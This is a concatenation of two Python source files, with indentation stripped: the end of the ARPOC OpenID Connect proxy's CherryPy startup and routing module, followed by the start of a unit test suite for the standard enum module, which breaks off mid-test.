raise cherrypy.HTTPRedirect(https_url)
def get_routes_dispatcher(self) -> cherrypy.dispatch.RoutesDispatcher:
""" Setups the Cherry Py dispatcher
This connects makes the proxied services accessible"""
dispatcher = cherrypy.dispatch.RoutesDispatcher()
# Connect the Proxied Services
for name, service_cfg in self.config.services.items():
logging.debug(service_cfg)
if service_cfg.origin_URL == "pap":
pap = arpoc.pap.PolicyAdministrationPoint('pap', self.oidc_handler, service_cfg)
dispatcher.connect('pap', service_cfg.proxy_URL, controller=pap, action='index')
dispatcher.connect('pap', service_cfg.proxy_URL + "{_:/.*?}", controller=pap, action='index')
elif service_cfg.origin_URL == "userinfo":
userinfo_page = arpoc.special_pages.Userinfo('userinfo', self.oidc_handler, service_cfg)
dispatcher.connect('userinfo', service_cfg.proxy_URL, controller=userinfo_page, action='index')
else:
service_proxy_obj = ServiceProxy(name, self.oidc_handler,
service_cfg)
dispatcher.connect(name,
service_cfg['proxy_URL'],
controller=service_proxy_obj,
action='index')
dispatcher.connect(name,
service_cfg['proxy_URL'] + "{_:/.*?}",
controller=service_proxy_obj,
action='index')
# Connect the Redirect URI
LOGGING.debug(self.config.proxy['redirect'])
for i in self.config.proxy['redirect']:
dispatcher.connect('redirect',
i,
controller=self.oidc_handler,
action='redirect')
# Test auth required
dispatcher.connect('auth',
"%s" % self.config.proxy.auth,
controller=self.oidc_handler,
action='auth')
dispatcher.connect('auth',
"%s/{name:.*?}" % self.config.proxy.auth,
controller=self.oidc_handler,
action='auth')
if self.config.proxy['https_only']:
dispatcher.connect('TLSRedirect',
'%s/{url:.*?}' % self.config.proxy.tls_redirect,
controller=self,
action='tls_redirect')
tls_dispatcher = TLSOnlyDispatcher(self.config.proxy.tls_redirect,
dispatcher)
return tls_dispatcher
return dispatcher
@staticmethod
def read_secrets(filepath: str) -> Dict:
""" Reads the secrets file from the filepath """
try:
with open(filepath, 'r') as ymlfile:
secrets = yaml.safe_load(ymlfile)
except FileNotFoundError:
secrets = dict()
if secrets is None:
secrets = dict()
return secrets
def save_secrets(self) -> None:
""" Saves the oidc rp secrets into the secrets file"""
with open(self.config.proxy['secrets'], 'w') as ymlfile:
yaml.safe_dump(self.oidc_handler.get_secrets(), ymlfile)
def create_secrets_dir(self) -> None:
assert isinstance(self.config.proxy, config.ProxyConfig)
secrets_dir = os.path.dirname(self.config.proxy['secrets'])
os.makedirs(secrets_dir, exist_ok=True)
self.uid = pwd.getpwnam(self.config.proxy['username'])[2]
self.gid = grp.getgrnam(self.config.proxy['groupname'])[2]
for dirpath, _, filenames in os.walk(secrets_dir):
if len(filenames) > 1:
raise arpoc.exceptions.ConfigError(
"Please specify an own directory for oidproxy secrets")
os.chown(dirpath, self.uid, self.gid)
for filename in filenames:
os.chown(os.path.join(dirpath, filename), self.uid, self.gid)
def setup_oidc_provider(self) -> None:
"""Setup the connection to all oidc providers in the config """
assert isinstance(self.config, config.OIDCProxyConfig)
# Read secrets
secrets = self.read_secrets(self.config.proxy['secrets'])
self.oidc_handler._secrets = secrets
for name, provider in self.config.openid_providers.items():
# check if the client is/was already registered
if name in secrets.keys():
self.retry(self.oidc_handler.create_client_from_secrets,
(requests.exceptions.RequestException,
oic.exception.CommunicationError), name, provider)
else:
self.retry(self.oidc_handler.register_first_time,
(requests.exceptions.RequestException,
oic.exception.CommunicationError), name, provider)
self.thread.start()
def run(self) -> None:
""" Starts the application """
#### Command Line Argument Parsing
parser = argparse.ArgumentParser(description='ARPOC')
parser.add_argument('-c', '--config-file')
parser.add_argument('--print-sample-config', action='store_true')
parser.add_argument('--print-sample-ac', action='store_true')
parser.add_argument('--add-provider')
parser.add_argument('--client-id')
parser.add_argument('--client-secret')
parser.add_argument('-d', '--daemonize', action='store_true')
parser.add_argument('--check-ac', action='store_true')
args = parser.parse_args()
config.cfg = config.OIDCProxyConfig(config_file=args.config_file)
self.config = config.cfg
assert self.config.proxy is not None
#### Read Configuration
if args.print_sample_config:
config.cfg.print_sample_config()
return
if args.print_sample_ac:
arpoc.ac.print_sample_ac()
return
self.setup_loggers()
#### Create secrets dir and change ownership (perm)
self.create_secrets_dir()
self.oidc_handler = OidcHandler(self.config)
if args.add_provider and args.client_id and args.client_secret:
# read secrets
secrets = self.read_secrets(self.config.proxy['secrets'])
provider_cfg = self.config.openid_providers[args.add_provider]
redirect_uris = provider_cfg.redirect_uris or self.config.proxy['redirect_uris']
# add secrets
secret_dict = {
"client_id": args.client_id,
"client_secret": args.client_secret,
"redirect_uris": args.redirect_uris
}
secrets[args.add_provider] = secret_dict
self.oidc_handler._secrets = secrets
self.oidc_handler.create_client_from_secrets(args.add_provider, provider_cfg)
self.save_secrets()
return
#### Read AC Rules
for acl_dir in self.config.access_control['json_dir']:
ServiceProxy.ac.load_dir(acl_dir)
if args.check_ac:
ServiceProxy.ac.check()
return
if args.daemonize:
daemonizer = Daemonizer(cherrypy.engine)
daemonizer.subscribe()
# check if pid file exists
try:
with open(self.config.misc.pid_file) as pidfile:
pid = int(pidfile.read().strip())
try:
os.kill(pid, 0) # check if running
except OSError:
PIDFile(cherrypy.engine,
self.config.misc.pid_file).subscribe()
# not running
else:
# running
print("PID File %s exists" % self.config.misc.pid_file)
print(
"Another instance of arpoc seems to be running"
)
return
except FileNotFoundError:
PIDFile(cherrypy.engine, self.config.misc.pid_file).subscribe()
#### Setup OIDC Provider
cherrypy.engine.subscribe('start', self.setup_oidc_provider, 80)
cherrypy.engine.subscribe('stop', self.cancel_scheduler, 80)
cherrypy.engine.subscribe('stop', self.save_secrets, 80)
#### Setup Cherrypy
global_conf = {
'log.screen': False,
'log.access_file': '',
'log.error_file': '',
'server.socket_host': config.cfg.proxy['address'],
'server.socket_port': config.cfg.proxy['tls_port'],
'server.ssl_private_key': config.cfg.proxy['keyfile'],
'server.ssl_certificate': config.cfg.proxy['certfile'],
'engine.autoreload.on': False
}
cherrypy.config.update(global_conf)
app_conf = {
'/': {
'tools.sessions.on': True,
'request.dispatch': self.get_routes_dispatcher()
}
}
DropPrivileges(cherrypy.engine, uid=self.uid, gid=self.gid).subscribe()
#### Start Web Server
cherrypy.tree.mount(None, '/', app_conf)
if self.config.proxy['plain_port']:
server2 = cherrypy._cpserver.Server()
server2.socket_port = self.config.proxy['plain_port']
server2._socket_host = self.config.proxy['address']
server2.thread_pool = 30
server2.subscribe()
cherrypy.engine.start()
cherrypy.engine.block()
# cherrypy.quickstart(None, '/', app_conf)
|
test_enum.py | import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
